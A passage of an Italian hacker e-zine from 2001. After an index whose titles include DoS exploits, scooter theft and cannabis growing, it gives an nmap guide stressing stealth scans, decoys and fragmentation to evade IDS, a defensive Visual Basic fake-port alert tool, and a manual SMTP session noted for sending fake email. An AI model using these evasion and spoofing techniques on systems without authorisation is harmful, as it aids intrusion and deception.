                    ____  _ _____  _____ __  __ __  _  ____  _____
                   | _) \| || () )|_   _|\ \/ /|  \| || ===||_   _|                     
                   |____/|_||_|\_\  |_|   |__| |_|\__||____|  |_|Numero "3"

                -+-+-+//\\ Rivista numero "3" Marzo 2001 //\\-+-+-+
                        
                             D I R T Y N E T  M A G A Z I N E                           

                               --=::Inizio Disclaimer::=--

Tutto il contenuto di questo testo  da ritenersi dannoso quindi non applicabile. L'utente  
pregato di non mettere in atto quanto scritto .Esso  solo stato pubblicato per offrire una 
conoscenza maggiore in ambito ,NON per altri scopi.Il testo non si puo' modificare ne tanto 
meno vendere senza il consenso dell'autore.Se non si rispettano le norme l'utente avr 
 commesso azione illegale. In questo testo  solamente presente INFORMAZIONE, e l'informazione 
per legge  LEGALE. Leggendo queste righe tu ACCETTI I TERMINI descritti, se ci fosse qualcosa 
di contrario alla tua' mente, esci e cancella questo file.
    
                                  --=::Fine Disclaimer::=--

Finalmente  uscita!


intro attached




--------------------------------------------------------------------------------

Si  concluso un anno ne  incominciato un'altro e rieccoci qui 
dinuovo davanti ad uno schermo voi per leggere io per scrivere.
Siamo giunti alla Dirtynet3 grazie agli sforzi e ai sacrifici di
tutti i membri e di tutta quella gente che ha collaborato con noi.

In questo nuovo numero sono presenti molti articoli interessanti 
ma che allo stesso tempo richiedono qualche conoscenza.Ci stiamo
impegnando quindi per rendere accessibili a tutti i nostri 
testi, infatti come avrete notato in ogni numero  presente una
lista con le rispettive e-mail di tutti gli autori.Questo perch 
il nostro scopo non  solo quello di dare prestigio a questa 
rivista ma anche quello (anzi soprattutto) di esporre a tutti le
nostre conoscenze.

Forse molti di voi stanno leggendo questa e-zine solo perch non
hanno niente di meglio da fare visto che il tempo non  dei
migliori.Questo articolo quindi  dedicato a tutti i miei amici
e a tutte quelle persone che mi stanno vicine tutto l'anno e non 
a quella gente che viene da me solo quando ha bisogno di qualcosa.

Finita questo piccolo sfogo tengo a precisare che questo non  
dovuto al mio stato d'animo ma solo al fatto che vorrei cercare 
di incominciare l'anno con il piede giusto.
Credo che questa intro vi abbia un po' annoiato (togliamo il po')
quindi vi lascio alla lettura di Dirtynet3.Grazie per l'attenzione.


A[v]a[t]A[r]
  H@ team





Ava ti sei sprecato!  :=)





(800x600 standard full screen)

      !--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--
                                                                             
                                     INDICE                                  
                                                                             
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       |Titolo|                                              |Autore|        
                                                                             
                                                                             
                                  --=Hacking=-- (or coding)                  
                                                                             
       [NMAP QUESTO SCONOSCIUTO..............................|kEwL.........]          
       [WINUNIX..............................................|Screener_it..] 
       [SENDMAIL E OLTRE.....................................|kEwL.........] 
       [MIRC 5.7 DENIAL OF SERVICE EXPLOITS..................|sYn..........] 
       [STARSCHEDULE 5.1 WEB SERVER DOS......................|Stevens......] 
       [MIMETIZZAZIONE TERMO OTTICA..........................|sYn..........] 
       [GUIDA PRATICA ALL'USO DI IPCHAINS....................|kEwL.........] 
       [SOCKS SCANNER........................................|.............] 
       [WINDOWS 95/98 IGMP FRAGMENT DOS......................|.............]   
       [FAKE MAIL : DI TUTTO DI +............................|A[v]a[t]A[r].] 
       [NAVIGARE CON VB!.....................................|sYn..........] 
       [ATTENTI AL DUCK!.....................................|A[v]a[t]A[r].] 
       [CRONACA DI UN SEMPLICE SITE HACK.....................|Mr. A........] 
                                                                             
                                 --=Phreaking=--                             
                                                                             
       [INFORMAZIONI GENERALI SUL PROTOCOLLO WAP.............|A[v]a[t]A[r].] 
       [COME T'INFLIPPO LA NUOVA CABINA......................|mR_bIs0n.....] 
                                                                             
                                                                             
                                                                             
                                --=Riflessione=--                            
                                                                             
       [RIFLESSIONE..........................................|Jrash........] 
       [INTERNET E REALTA'...................................|Jrash........] 
                                                                             
                                                                             
                                  --=Mezzing=--                                            
                                                                             
       [COME RUBARE UN MOTORINO..............................|Jrash........] 
       [COME MONTARE UN VALIDO ANTIFURTO SUL VOSTRO SCOOTER..|Jrash........] 
                                                                             
                                  --=Narcoting=--                                          
                                                                             
       [MARIA COLTIVATION....................................|phaet........] 
                                                                             
                                                                             
                                 --=Miscellanea=--                           
                                                                             
       [GUIDA ALLA FACILE INSTALLAZIONE DI WINDOWS 2000......|sYn&Norman^B^] 
       [MONDO SMS............................................|.............] 
       [WRITERS BLOCK (LO STILE).............................|Jrash........] 
       [EFFETTO CON IL MIRC!.................................|NCKxxx.......]  
                                                                             
                                                                              
                [Nella prossima release...             ]                     
                                                                             
      !--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--
                                                                             
                                 Autori e membri                             
                              con rispettive e-mail                          
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                             
       [sYn----------------------------------------syn@hackersat.com-------] 
       [A[v]a[t]A[r]-------------------------------avatar@hackersat.com----] 
       [Screenet_it--------------------------------screener_it@freemail.it-] 
       [Jrash--------------------------------------jrash@hackersat.com-----] 
       [mR_bIsOn-----------------------------------stusciti@yahoo.it-------] 
       [kEwL---------------------------------------kewl@penguinpowered.com-] 
       [Ghent--------------------------------------ghent@hackersat.com-----] 
       [phaet--------------------------------------vesa8_34@yahoo.it-------] 
       [Mr. A--------------------------------------------------------------] 
       AScii by sYn^]|[ & kEwL                                                         


                        < w w w . h a c k e r s a t . c o m >           10x ALL!

 
< s[Y]n >

Abbasso BERLUSCONI!


--------------------------------------=:ALLEGATI (=attc=):=------------------------------------



winunix.zip = Progetto e frm del programma "Winnunix" creato da Screener_it.(leggi 
testo "WINUNIX" della rivista)

Manuale HTML.zip = un bel file passatomi da mio cugino! Una ottima guida all'HTML.

pezzo1.gif = pezzo puppet del nostro Jrash.

pezzo2.jpg = pezzo del nostro Jrash.

pezzo3.jpg = pezzo del nostro Jrash.(sono un po' ripetitivo?)

root.gif = un'altra immagine, sfizziosa...

----------------------------------------=Hacking=----------------------------------------------
        
     
              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              		         NMAP QUESTO SCONOSCIUTO                      
              				    		                        kEwL  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




NMAP QUESTO SCONOSCIUTO

INTRODUZIONE
Nmap permette agli amministratori di sistema (e non) di analizzare i propri (e 
non ;) computers per vedere quali servizi offrono. Con nmap si possono 
effettuare diversi tipi di scan come per esempio UDP, TCP connect(), TCP syn e 
altri; inoltre nmap fornisce funzioni avanzate come per esempio il rilevamento 
del sistema operativo remoto tramite il fingerprint TCP\IP, scanning con decoy, 
scanning parallelo, ecc. Il risultato di una scansione con nmap sar una lista 
di porte e il loro attributo. Una porta pu essere aperta (open) filtrata 
(filtered) o non filtrata (unfiltered). Una porta aperta  una porta che accetta 
le connessioni.  Una porta filtrata ci fa capire che quella porta  protetta da 
un firewall o qualcosa del genere. Una porta non filtrata  quando nmap sa che 
la porta  chiusa e non ci sono firewall/filtri che interferiscono con il 
tentativo di nmap per determinare lo stato di quella porta.

RIGA DI COMANDO
Ecco la riga di comando che si usa per nmap

nmap [tipo di scan] <opzioni> [HOST]

I campi obbligatori sono il tipo di scan e l'host. Puoi scegliere solo un tipo 
di scan per volta mentre puoi inserire tutte le opzioni che vuoi. Ma andiamo a 
vedere nel dettagli i vari campi.

TIPI DI SCAN
In questa sezione descriver i tipi di scan (con il relativo parametro) che nmap 
pu effettuare.

a. TCP connect() * -sT
Questo  lo scan di base. La chiamata connect() cercher di stabilire una 
connessione TCP completa (3way handshake) con ogni porta dell'host remoto. Se la 
porta  in ascolto, connect() avr successo e la porta verr segnalata aperta, 
altrimenti chiusa. Per eseguire questo scan non hai bisogno dei permessi di 
root.

b. Scan TCP SYN * -sS 
Questa tecnica  anche conosciuta come scanning "half-open" (mezzo aperto), 
perch non si stabilisce una connessione TCP completa. In pratica questo tipo di 
scan manda un pacchetto SYN all'host remoto; se questo risponde con un SYN\ACK, 
vuol dire che la porta  aperta, se invece risponde con un RST, la porta  
chiusa.  Una volta che abbiamo ricevuto il SYN\ACK, verr immediatamente mandato 
un RST per interrompere la connessione.  Pochi host loggheranno questo tipo di 
scan, ma per effettuarlo sono necessari i permessi di root.

c. Stealth FIN, Xmas Tree o Null scan * -sF -sX -sN
A volte uno scan SYN non  abbastanza clandestino perch ci sono dei firewalls o 
cose del genere che rintracciano questi scan. Questi tre tipi di scan possono 
bypassare questi fastidiosissimi firewalls. L'idea di questi tipi di scan deriva 
dal fatto che le porte chiuse rispondono al tuo pacchetto sonda con un RST 
mentre le porte aperte ignoreranno il pacchetto in questione. Lo scan FIN manda 
pacchetti FIN (ma guarda un po'...); Xmas Tree usa i flags FIN, URF e PUSH; Null 
scan infine spegne tutti i flags. Questi tipi di scan funzionano solo con 
macchine non windows, poich la micro$oft ha deciso di ignorare gli standards e 
di fare le cose a modo loro.

d. Ping scanning * -sP
Questo tipo di scan serve solo a verificare quali macchine sono attive nella 
rete che vogliamo verificare. Normalmente, questo scan avviene mandando un ICMP 
echo a ogni indirizzo IP della rete, ma siccome ci sono delle reti che bloccano 
i pacchetti ICMP echo (vedi microsoft.com), vengono usati altri 2 metodi per 
verificare se una macchina  attiva. Il primo modo  di mandare un pacchetto TCP 
ack alla porta 80; se arriva un RST, vuol dire che la macchina  attiva. L'altro 
modo  mandare un pacchetto SYN e aspettare un RST o un SYN\ACK. Se non abbiamo 
i permessi di root, verr usato il metodo connect().

e. UDP scan * -sU
Questo metodo viene utilizzato per trovare le porte UDP aperte su un host. Per 
fare ci, il nostro buon nmap manda dei pacchetti udp di 0 byte all'host che ci 
interessa. Se riceviamo un messaggio ICMP port unreachable, vuol dire che la 
porta  chiusa, altrimenti pensiamo che la porta  aperta.

f. ACK scan * -sA
Questo metodo avanzato serve a rintracciare i rules di un firewall. Questo tipo 
di scan manda un pacchetto ACK alle porte specificate. Se riceviamo un RST, la 
porta  classeificata come non filtrata (unfiltered); se invece non riceviamo 
niente, oppure riceviamo un ICMP unreachable, la porta  classificata filtrata 
(filtered). Questo tipo di scan non mostra le porte aperte (open).

g. Window scan * -sW
Molto simile all'ACK scan, a volte rintraccia porte aperte come filtrate o non 
filtrate a causa di un'anomalia nella dimensione della finestra TCP in alcuni 
sistemi operativi come AIX, UNIX, FreeBSD, OS/2, SunOS 4.x e altri.

h. RCP scan * -sR
Questo metodo lavora in combinazione con gli altri metodi di Nmap. Prende tutte 
le porte aperte trovate e le flooda nel tentativo di trovare porte RCP.

i. FTP bounce attack * -b <host FTP>
Sfrutta un FTP come proxy.

OPZIONI GENERALI
Ecco delle opzioni che potrebbero essere utili

-P0 : Non manda ping prima di scansionare un host. Permette la scansione di reti 
che non permettono le richieste ICMP echo.
-PT : Usa il TCP ping per determinare gli hosts attivi. Manda un ACK al posto di 
un ICMP.
-PS : Usa un pacchetto SYN per determinare gli hosts attivi.
-PI : Usa un ICMP echo per determinare gli hosts attivi.
-PB : E' il tipo di ping predefinito. Usa sia ACK che ICMP.
-O : Rileva il sistema operativo dell'host remoto grazie al TCP\IP fingerprint.
-I : Attiva il TCP reverse ident scanning. Viene interrogato l'identd dell'host 
remoto ad ogni porta aperta trovata.
-f : Suddivide l'header TCP in pi pacchetti negli scan SYN, FIN, XMAS e NULL, 
in modo da non far rintracciare lo scan a firewalls e simili.
-v : Ti informa cosa sta succedendo passo dopo passo. Usalo due volte per un 
effetto maggiore.
-h : Mostra una schermata con un aiuto veloce su nmap.
-oN <logfile> : Memorizza i risultati dello scan in un file di log.
-oM <logfile> : Simile a quello di sopra solo che mostra anche i messaggi 
d'errore.
-oS <logfile> : Memorizza i risultati dello scan in un file di log con caratteri 
speciali.
-resume	 <logfile> : Recupera uno scan che  stato interrotto da un control-C o 
un errore generico. Il file di log deve essere memorizzato o con -oN o con -oM.
-iL <inputfile>	: Legge le specifiche dell'obiettivo tramite l'inputfile.
-iR : Dice a nmap di generare da solo degli hosts prendendo numeri a caso.
-p <intervallo di porte> : Specifica l'intervallo di porte (o la porta) che vuoi 
scansionare. -p 23 controlla solo la porta 23 mentre -p 1000-2000 controlla le 
porta da 1000 a 2000.
-F : Specifica che vuoi scansionare solo le porte specificate nel file dei 
servizi distribuito con nmap.
-D <decoy1[,decoy2][,ME],...> : Fa vedere all'host che stai scansionando che lo 
scan viene effettuato anche dai decoy (IP) che inserisci. L'IDS vedr tutti gli 
ip che hai inserito e non sarpr da che ip viene realmente lo scan. E' molto 
buono per nascondere il tuo indirizzo IP. Puoi usare ME (che sarebbe il tuo IP) 
tra i decoys; se lo inserisci tu rispetter quella posizione, mentre se non lo 
inserisci gli verr assegnata una posizione non definita. Ricordo che i decoys 
devono essere indirizzi ip di macchine attive, altrimenti non farai altro che 
floodare son dei SYN il tuo obiettivo.
-S <Indirizzo_IP> : In alcuni casi nmap non riconosce il tuo indirizzo IP e 
quindi devi specificarlo con questo parametro. Viene usato in combinazione con 
-e (che specifica l'interfaccia). Con questo parametro volendo si pu anche 
cambiare il proprio indirizzo IP ... ma non lo dite a nessuno ;).
-e <interfaccia> : Dice a nmap quale interfaccia manda e riceve i pacchetti.
-g <numero di porta> : Specifica la porta sorgente da cui vengono effettuate le 
connessioni per il port scan.
-r : Dice a nmap di non scansionare le porte a casaccio.
--randomize_hosts : Dice a nmap di mischiare ogni gruppo fino a 2048 hosts prima 
di scansionarli. Questo pu rendere le scansioni meno ovvie ai vari NIDS.
-M <max_sockets> : Setta il numero massimo di socket che devono essere usati in 
uno scan TCP connect(); questo rallenter un po' lo scan ma saremo sicuri che le 
macchine remote non crasheranno.

OPZIONI DI TEMPO
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> : E' la velocit della 
scansione. Paranoid scansiona *molto* lentamente per evitare di essere 
rintracciati dagli IDS; aspetta 5 minuti prima di mandare i pacchetti. Sneaky  
simile, solo che aspetta 15 secondi prima di mandare i pacchetti. Polite aspetta 
0.4 secondi prima di mandare i pacchetti ed  probabile che la macchina remota 
non crashi. Normal  il comportamento standard di nmap, e manda i pacchetti 
appena possibile, senza sovraccaricare la rete. Aggressive aggiunge un timeout 
di 5 minuti per ogni host e non aspetta mai pi di 1.25 secondi per controllare 
le risposte. Insane  fatto solo per reti veloci; aggiunge un timeout di 75 
secondi e aspetta solo 0.3 secondi per le risposte. Puoi usare anche i numeri al 
posto delle parole (0=Paranoid,...,5=Insane).
--hosts_timeout <millisecondi> : Specifica quanto tempo nmap deve aspettare 
prima di lasciar perdere quell'IP.
--max_rtt_timeout <millisecondi> : Specifica quanto tempo nmap deve aspettare 
per controllare la risposta prima di rispondere.
--min_rtt_timeout <millisecondi> : Aspetta almeno il tempo prestabilito prima di 
lasciar perdere una risposta.
--initial_rtt_timeout <millisecondi> : Specifica il timeout iniziale di 
risposta.
--max_parallelism <numero> : Specifica quanti scan pu effettuare nmap in 
parallelo.
--scan_delay <millisecondi> : Specifica l'intervallo di tempo minimo che nmap 
deve aspettare tra le risposte.

COME SI SCRIVE UN OBIETTIVO?
Tutto quello che non  un'opzione, per nmap  un obiettivo. Puoi specificare 
solo un indirizzo IP, come per esempio 212.216.145.12, oppure puoi specificare 
anche delle sottoreti, scrivendo 212.216.145.12/MASK. Una mask pu essere 0 
(scansiona tutto internet), 16 (scansiona indirizzi di classe B, 24 (scansiona 
indirizzi di classe C) e 32 (scansiona solo quell'indirizzo IP). Al posto della 
mask si possono usare anche gli asterischi. Infatti puoi scansionare range di IP 
scrivendo, per esempio, 212.216.*.*. Al posto di usare gli asterischi si possono 
usare anche altri modi, come per esempio 212.216.0-255.0-255 (che  la stessa 
cosa che abbiamo scritto prima).

ESEMPI
Allora...dopo aver scritto tutto sto papocchio facciamo qualche esempio pratico.
Cominciamo a fare uno scan TCP connect(), all'indirizzo 194.195.25.35 (per 
esempio). Scriviamo:

nmap -sT 194.195.25.35

Facile no? Se volevamo fare uno scan SYN? Basta sostituire -sS a -sT ed il gioco 
 fatto! E se per esempio vogliamo sapere il sistema operativo del computer 
remoto? Niente di pi facile! Aggiungiamo il parametro -O. E se per esempio 
vogliamo fare uno scan con dei decoys? Non bisogna far altro che aggiungere -D 
212.216.123.2,213.213.7.50,194.184.26.54,210.212.190.5 (per esempio) ed il gioco 
 fatto (consiglio di mettere sempre almeno 5 decoys). Potete effettuare 
migliaia di tipi di scan combinando le moltissime opzioni che nmap mette a 
disposizione.

Bene ora che sapete cos' nmap e sapete come si usa (almeno lo spero! ;) andate 
a scaricarlo a http://www.insecure.org/nmap e buon divertimento! Se avete 
qualche domanda da farmi o se volete correggermi o semplicemente se vi sto 
antipatico/simpatico non esitate a mandarmi un'email. Grazie per l'attenzione! 
Alla prox...byeeeeeee! ;P


						 kEwL` <kewl@penguinpowered.com>


              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              			             WINUNIX                            
              				    		                 Screener_it  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Autore: Screener_it
email: screener_it@freemail.it
URL: www.tankcommandos.org
DATA: 07/01/01

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Le caxxate che si dicono in giro per la rete sono tante. Tantissime !!
Dalle leggende metropolitane, ai giudizi affrettati, alle idee fisse
nella mente di chi ha sentito solo una campana..
Di leggende metropolitane ne avete sentite anche troppe, giudizi affrettati
anche..
Le idee fisse cosa sono ? Sono le idee messe in giro da una minoranza che sono
poi diventate il pensiero della massa..
La pi classica  che per forza chi  un hacker  un anarchico. E allora gi
con i ragazzini che riempiono i loro siti di stemmi anarchici credendo che 
cos sono molto pi underground.
Un'altra idea fissa  quella che odio di pi: Visual Basic  un linguaggio da
lamer..
E questo perch ?? Semplice,  un prodotto della Microsoft e quindi tutto quello
che  Microsoft = lamer.
Dimenticando che Ms-Dos  un frutto della MS, dimenticando che il 99% ha iniziato
a usare il pc con Windows ( 3.1, 95, 98, ..).
Alzi la mano (scriva 'na mail) chi ha iniziato a usare il pc installandosi Linux
da solo !!!!!!!!!!!!
E' vero, alcuni prodotti della MS sono discutibili, prezzi vergognosi, per..
Diamo alla MS quello che  della MS !!!

Visual Basic non  un linguaggio pi avanti,  verissimo !!
E' pur sempre vero che con poche righe di comandi si possono fare programmi
eccellenti. Ho aggiunto una campana al coro. Ascoltatele tutte prima di farvi
una vostra idea !!!

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Oggi parleremo di come creare WinUnix !!
E che caxxo  WinUnix ?? WinUnix  un programma nato dalla mia mente malata per
confondere gli avversari che mi fanno scanning, per avvertirmi di tentativi
di connessione, ecc..

Questo programma infatti apre porte classiche di un sistema Unix-like 
( telnet su tutte ) o cmq porte non usuali su un computer casalingo 
( POP3, SMTP, finger, ecc..) e cos a un eventuale scanning l'attaccante si troverebbe
in difficolt a riconoscere un sistema Windows.. 
In pi in caso di scanning / tentativi di connessione mi avverte indicandomi l'ip
dell'attaccante e la porta a cui ha provato a collegarsi !!

Di cosa abbiamo bisogno per creare questo programmino ???
Poca roba:
1.- Visual Basic 5 (o succ.)
2.- Un po' di esperienza in Vb non guasta (ma possiamo farne a meno).

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Allora, cominciamo..
Prendete Visual Basic e versatelo in un recipiente abbastanza capiente e iniziate
a mescolare.. No, caxxo, ho sbagliato guida !!

Prima due paroline su cosa faremo. Questo programma si metter in ascolto sulle seguenti
porte:
23 (telnet)
25 (SMTP)
79 (finger)
110 (POP3)
E fin qui ci siamo. Una cosa in pi: queste porte nella realt usano il protocollo TCP.
Come ben sapete in rete esistono principalmente due protocolli: il TCP e l'UDP.
Una certa differenza tra i due c', spiegarla qui  inutile, cmq sappiate che il pi
usato  il TCP, che  anche il pi sicuro, xk, al contrario dell'UDP, controlla che
i dati siano arrivati a destinazione, mentre l'UDP lancia i dati e.. Se arrivano bene, 
se non arrivano..
Cmq dato che vogliamo essere il pi vicino possibile alla realt useremo anche noi il 
protocollo TCP per questo progetto.

Per creare applicazioni Visual Basic che interagiscono con le potenzialit di Internet
abbiamo bisogno di un componente particolare di Visual Basic !
Il suo nome  Winsock e si carica in Visual Basic semplice andando in 
Progetto / Componenti e dall'elenco che appare selezionare "Microsoft Winsock Control" e poi
cliccare Ok.
Se andate nella barra degli strumenti a sinistra vedrete che ora  apparso un disegnino con
due computer. Se ci andate sopra vedrete la scritta "Winsock".
Perfetto..
Ora si tratta di aggiungere questo componente alla nostra form. Cliccate sopra quel
disegnino di prima e poi portatelo nel form. Perfetto !!
Nella form apparir questo disegnino con il nome di Winsock1.

Ma cos' il Winsock ?? Il Winsock non  altro che un componente di Visual Basic che funziona
in modo simile a telnet. Esso infatti pu creare una connessione tra due pc, spedire 
stringhe di dati da un pc all'altro, ecc..

Capito ? Bene. Andate a destra, dove vedete un finestra con il titolo "Propiet".
Prima cosa vedete la propiet (Name). Per non fare confusione lo chiameremo TCP1.
Scorrete l'elenco e arrivate fino alla propiet Protocol e controllate che siano
impostate su sckTCPProtocol, ok ??

Ogni porta del nostro progetto ha bisogno di un componente Winsock, quindi sulla form dobbiamo
 crearne quattro. Che chiameremo TCP1, TCP2, TCP3, TCP4. Ok ??? Sono importanti i nomi, 
altrimenti
pi avanti non capirete niente !!

Inserite poi:
1 label con nome "lblip"
1 label con nome "lblporta"
entrambe devono essere vuote.

Ok, adesso passiamo al codice vero e proprio. Fate doppio clic su un punto qualsiasi
 della form
e vi apparir la scritta:

Private Sub Form_Load()

End Sub

che voi completerete in questo modo:

Private Sub Form_Load()
    TCP1.LocalPort = Val(23)
    TCP1.Listen
    TCP2.LocalPort = Val(25)
    TCP2.Listen
    TCP3.LocalPort = Val(79)
    TCP3.Listen
    TCP4.LocalPort = Val(110)
    TCP4.Listen
End Sub

Che abbiamo fatto ?? Semplice !! Ogni volta che il programma parte automaticamente i quattro 
Winsock che abbiamo messo nel form si metteranno in ascolto sulle porte decise da noi.

TCP1.LocalPort = Val(23)
Questa riga serve per indicare al controllo TCP1 su quale porta operare (in questo caso la 23).

TCP1.Listen
Questa riga serve ad indicare al controllo TCP1 cosa fare.. In questo mettersi in ascolto 
sulla porta che prima abbiamo indicato.

Ok, adesso le porte sono in ascolto.. E adesso che facciamo ???? Dobbiamo dire ai vari 
protocolli come comportarsi in caso di connessione..

Quindi nel codice della form aggiungete questa riga:

Private Sub TCP1_ConnectionRequest(ByVal requestID As Long)

End Sub

In mezzo a questa righe dovete dire al controllo come comportarsi in caso di richiesta di 
connessione.Noi vogliamo che quando c' un tentativo di connessione ci avverta indicandoci 
l'ip dell'attaccante e la porta alla quale ha tentato di attaccarsi !!
Quindi:

Private Sub TCP1_ConnectionRequest(ByVal requestID As Long)
lblip = TCP1.RemoteHostIP
lblporta = "23"
TCP1.Close
TCP1.LocalPort = Val(23)
TCP1.Listen
End Sub

Un po' di spiegazioni ve le devo, eh ?? Allora.. In caso di tentativo di connessione alla 
controllo TCP1 (che controlla la porta 23) nella casella lblip apparir l'ip dell'attaccante:
lblip = TCP1.RemoteHostIP
E nella casella lblporta apparir la porta alla quale ha tentato di collegarsi.. In questo 
caso la 23.

Dopodiche che succede ?? Dopo averci informato dell'attacco il programma ci difende 
dall'attaccante, chiudendogli la connessione con il nostro pc:
TCP1.close
E poi si rimette in ascolto sulla stessa porta in attesa di nuovi attacchi..

Facciamo lo stesso lavora sul controllo TCP2...

Private Sub TCP2_ConnectionRequest(ByVal requestID As Long)
lblip = TCP2.RemoteHostIP
lblporta = "25"
TCP2.Close
TCP2.LocalPort = Val(25)
TCP2.Listen
End Sub

E poi sugli altri controlli...

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

I codici principali del programma si chiudono qui, ma evidentemente ha bisogno di qualche
ritocco.. Infatti per adesso il programma funziona ma  molto rozzo.. Vi troverete a una
form grigia che quando c' una connessione diventa cos:
    ____________________
   |			|
   |			|
   |  192.132.134.135   |
   |		   25	|
   |____________________|

Direi che  piuttosto misera.. Aggiungiamo un po' di roba..
Prima di tutto un label con la scritta:"Ip attaccante:" e una con scritto "Porta:"
Mh.. S, meglio ma ha bisogno di qualche ritoccatina.. Sarebbe meglio che vediamo la
form solo qualche veniamo "attaccati".. Imposta la propiet visible della form
su false..
Vogliamo che appaia solo quando nella casella lblip appare un ip.. Giusto ?
Che appaia in primo piano per avvertirci del pericolo..
Mo
Ecco qui il codice:

Private Sub lblip_Change()
If lblip = "" Then Me.Visible = False Else lblip.Visible = True
SetWindowPos Me.hWnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOACTIVATE Or SWP_SHOWWINDOW Or !!
SWP_NOMOVE Or SWP_NOSIZE
End sub

E nelle dichiarazioni mettete questi codici:

Const HWND_TOPMOST = -1
Const HWND_NOTOPMOST = -2
Const SWP_NOSIZE = &H1
Const SWP_NOMOVE = &H2
Const SWP_NOACTIVATE = &H10
Const SWP_SHOWWINDOW = &H40
Private Declare Sub SetWindowPos Lib "User32" (ByVal hWnd As Long, ByVal hWndInsertAfter As !!
Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As 
Long)

Dove vedete i punti di esclamazione ( !! )  xk dovete mettere tutto su una riga nel 
programma, non andare a capo come ho fatto io..

Poi ci aggiungiamo un pulsantino ( command1 ) che se cliccato f diventare la form di nuovo
invisibile:

Private Sub Command1_Click()
lblip = ""
lblbporta = ""
me.Visible = False
End Sub

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Ok, io avrei finito.. Se non avete chiaro qualcosa insieme alla rivista dovrebbero esserci 
allegati i sorgenti scritti in Vb 6 di questo programma.
Se ancora avete dubbi sendatemi una mail: screener_it@freemail.it

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Finito !! Un saluto particolare a:
- Tutti quelli che scrivono su Dirty Net
- I ragazzi di #hackersonline su AzzurraNet e #hack.it su irc.tin.it
- Syn^, Spyro, MrWolf, Bakunin, BigAlex, Tripping, GreenDragon
- Tutti quelli che si sono visti il derby Milan - Inter del 07/01 che io vedr stasera a
casa mia (volevo andare anch'io, non  giusto !!!)
- A Fabrizio, il primo anarchico-leghista della storia !! :))))

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\






              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              			      SENDMAIL E OLTRE                          
              				    		                        kEwL  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




=========================================================== 
 Sendmail e oltre: Consigli di Ankit Fadia ankit@bol.net.in
===========================================================

Benvenuto a un altro manuale delle Verit sullHacking. Bench questo manuale viene dopo un 
lungo periodo di pausa,  molto bello tornare a scrivere per lHT. Comunque, nel passato, 
abbiamo avuto un numero di spiegazioni su come mandare email false, come giocare con il demone 
Sendmail, gli headers delle email e tutto quello che si pu fare con SMTP (Simple Mail 
Transfer Protocol) e email. Bench questo manuale mette troppo in luce la materia trattata,  
comunque pi mirato su consigli avanzati e altre informazioni poco comuni ma molto utili.
Ora, abbiamo gi imparato come si fa, telnettarsi alla porta 25 di un server mail e mandare un 
email (anche unemail falsa) scrivendo semplicemente alcuni comandi SMTP. Comunque, 
per il beneficio dei dilettanti e di rinfrescare la memoria delle persone pratiche ma 
smemorate, ripercorreremo velocemente tutto il processo. Prometto di renderlo quanto pi 
breve  possibile, allo stes-so tempo facile da capire.
La porta 25  la Porta Sendmail dove  eseguito il demone SMTP. Questo demone  infatti il 
demone che gestisce la posta in uscita. Tutti i client email mandano le email connettendosi 
alla porta 25 di un server email ed emettendo i comandi SMTP. Questo processo  automatizzato 
e viene eseguito in background. Comunque, ognuno pu manualmente connettersi (telnet) alla 
porta 25 di un server mail e manualmente scrivere i comandi SMTP in modo da mandare le email. 
Ripoter i comandi di base. Per dettagli riguardanti luso individuale dei comandi, scrivi 
semplicemente la parola help seguita dal comando al prompt di Sendmail.
Nota: Lesempio seguente manda una mail da ankit@bol.net.in a namitas@bol.net.in emettendo i 
comandi SMTP al server mail: mail.isp.com. Le risposte del server mail hanno un numero che 
precede esse mentre i comandi scritti dallutente non hanno numeri. 

***********************************************************************************************
C:\windows>telnet mail.isp.com
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530 
(IST)
helo ankit.com
250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you
mail from: ankit@bol.net.in
250 ankit@bol.net.in... Sender ok
rcpt to: namitas@bol.net.in
250 namitas@bol.net.in... Recipient ok
data
354 Enter mail, end with "." on a line by itself
This is the part where the body of the message is typed in. 
.
250 RAA0000001693 Message accepted for delivery
***********************************************************************************************

Gli headers della email sopra riportata come visto dal destinatario sono i seguenti: 

***********************************************************************************************
Return-Path: <ankit@bol.net.in>
Received: from ankit.com by mail.isp.com (8.9.1/1.1.20.3/07Jul00-0916AM)
id RAA0000001693; Thu, 7 Dec 2000 17:19:49 +0530 (IST)
Date: Thu, 7 Dec 2000 17:19:49 +0530 (IST)
From: Ankit Fadia <ankit@bol.net.in>
Message-Id: <200012071149.RAA0000001693@mail.isp.com>
X-UIDL: 920156a3b926c5193036933e6d04efd5

This is the part where the body of the message is typed in.
***********************************************************************************************

